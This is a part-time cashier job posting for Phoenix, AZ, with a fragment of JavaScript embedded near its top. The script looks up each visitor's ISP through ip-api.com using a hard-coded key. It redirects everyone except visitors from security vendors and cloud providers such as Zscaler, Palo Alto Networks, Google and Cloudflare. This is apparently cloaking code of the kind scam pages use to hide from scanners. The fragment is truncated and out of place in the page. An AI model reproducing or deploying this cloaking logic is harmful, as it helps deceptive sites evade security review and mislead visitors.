Cashier Team Member (Front End Service) – Part Time
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a friendly and attentive Cashier Team Member (Front End Service) - Part Time in Phoenix, AZ to provide exceptional customer service and maintain a positive shopping experience.
Responsibilities include:
- Processing customer transactions accurately and efficiently at the checkout counter
- Assisting customers with questions, returns, and product inquiries
- Maintaining a clean and organized checkout area
- Supporting team members in stocking and merchandising tasks as needed
- Upholding safety and store policies to ensure a secure environment
Skills needed:
- Excellent communication and interpersonal skills
- Ability to handle transactions with accuracy and attention to detail
- Friendly, approachable attitude
- Ability to work in a fast-paced environment
- Team player with a proactive mindset
Benefits include:
- Flexible part-time hours
- Employee discounts
- Training and development opportunities
- Positive team environment